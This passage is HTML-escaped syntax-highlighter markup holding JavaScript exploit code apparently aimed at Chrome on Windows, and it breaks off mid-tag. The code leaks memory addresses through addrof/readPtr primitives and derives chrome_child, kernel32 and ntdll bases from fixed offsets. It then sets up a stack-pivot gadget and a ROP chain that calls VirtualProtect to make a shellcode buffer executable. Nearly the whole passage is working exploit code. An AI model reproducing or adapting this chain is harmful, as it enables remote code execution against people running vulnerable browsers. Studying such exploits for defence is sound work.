class=\"crayon-v\">div<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">createElement<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;div&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-191\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">div_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">memory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">addrof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">div<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-192\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/alert(&#8216;div_addr = &#8216; + hex(div_addr));<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-193\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">el_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">memory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">readPtr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">div_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x20n<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-194\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">leak<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">memory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">readPtr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">el_addr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-195\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-196\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">chrome_child<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">leak<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x40b5f20n<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-197\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/print(&#8216;chrome_child @ &#8216; + hex(chrome_child));<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-198\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ CreateEventW<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-199\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">kernel32<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">memory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">readPtr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">chrome_child<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x4771260n<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x20750n<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-200\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/print(&#8216;kernel32 @ &#8216; + hex(kernel32));<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-201\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ NtQueryEvent<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-202\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">ntdll<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">memory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">readPtr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">kernel32<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x79208n<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x9a9a0n<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-203\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/print(&#8216;ntdll @ &#8216; + hex(ntdll));<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-204\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-205\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/*<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-206\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;00007ff9`296f0705 488b5150&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;mov&nbsp;&nbsp;&nbsp;&nbsp; rdx,qword ptr [rcx+50h]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-207\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;00007ff9`296f0709 488b6918&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;mov&nbsp;&nbsp;&nbsp;&nbsp; rbp,qword ptr [rcx+18h]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-208\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;00007ff9`296f070d 488b6110&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;mov&nbsp;&nbsp;&nbsp;&nbsp; rsp,qword ptr [rcx+10h]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-209\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;00007ff9`296f0711 ffe2&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;jmp&nbsp;&nbsp;&nbsp;&nbsp; rdx<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-210\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;*\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-211\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-212\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">gadget<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ntdll<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xA0705n<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-213\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/let gadget = 0x41414141n;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-214\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-215\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">pop_gadgets<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-216\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">chrome_child<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x36a657n<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/ pop rcx ; ret&nbsp;&nbsp;&nbsp;&nbsp; 59 c3<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-217\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">chrome_child<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x9962n<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/ pop rdx ; ret&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 5a c3<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-218\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">chrome_child<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xc72852n<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/ pop r8 ; ret&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;41 58 c3<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-219\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">chrome_child<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xc51425n<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/ pop r9 ; ret&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;41 59 c3<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-220\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-221\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-222\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">scratch_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">memory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">readPtr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">memory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">addrof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">scratch<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x20n<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-223\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-224\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">sc_offset<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x20000n<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">scratch_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x1000n<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-225\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">sc_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">scratch_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sc_offset<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-226\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">scratch_u8<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">set<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">shellcode<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">Number<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">sc_offset<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-227\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-228\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">scratch_u64<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">fill<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">gadget<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">100<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-229\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/scratch_u64.fill(0xdeadbeefn, 0, 100);<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-230\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-231\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">fake_vtab<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">scratch_addr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-232\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">fake_stack<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">scratch_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x10000n<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-233\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-234\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">stack<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-235\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">pop_gadgets<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-236\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sc_addr<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-237\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">pop_gadgets<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-238\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0x1000n<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-239\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">pop_gadgets<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-240\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0x40n<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-241\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">pop_gadgets<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-242\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">scratch_addr<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-243\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">kernel32<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x193d0n<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/ VirtualProtect<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-244\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sc_addr<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-245\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-246\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">let<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">stack<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">length<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-247\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">scratch_u64<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0x10000<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">stack<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-248\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-249\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-250\"><span 